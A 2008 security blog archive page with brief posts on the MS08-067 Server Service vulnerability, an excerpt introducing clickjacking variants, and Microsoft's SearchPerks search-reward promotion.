Posts

Showing posts from October, 2008

MS08-067 Vulnerability in Server Service Could Allow Remote Code Execution

MSRC INFO Dennis Fisher gives a nice and simple breakdown of one piece of known malware targeting this vulnerability here . GD

In the News

ClickJack exploits  (from Rsnake at  ha.ckers.org) Today is the day we can finally start talking about clickjacking. This is just meant to be a quick post that you can use as a reference sheet. It is not a thorough advisory of every site/vendor/plugin that is vulnerable - there are far too many to count. Jeremiah and I got the final word today that it was fine to start talking about this due to  the click jacking PoC against Flash that was released today  (watch the video for a good demonstration) that essentially spilled the beans regarding several of the findings that were most concerning. Thankfully, Adobe has been working on this since we let them know, so despite the careless disclosure, much of the work to mitigate this on their end is already complete. First of all let me start by saying there are multiple variants of clickjacking. Some of it requires cross domain access, some doesn’t. Some overlays entire pages over a page, some uses iframes to get you to click on one spot. Som...

MS Pays you to search

Its latest edition is the Search Perks incentive, which joins Live Search Club, Search and Give, and Live Search Cashback promotions in recent months. Microsoft is getting a little trickier with its latest effort -- you not only have to use Microsoft's Live Search, but you also have to use its Internet Explorer Browser which is bad news for Firefox stalwarts. To join the promotion, users must download a small program. You can't download the program or view the true SearchPerks site from Firefox or Opera browsers. Once you get the program, it tracks your searching and gives you one ticket per search query. You can earn up to 25 tickets a day. In April, users can cash in the tickets for prizes or to give money to charity. Microsoft has not announced the prizes yet, but one of them might start with "V" and end with "ta" according to rumors.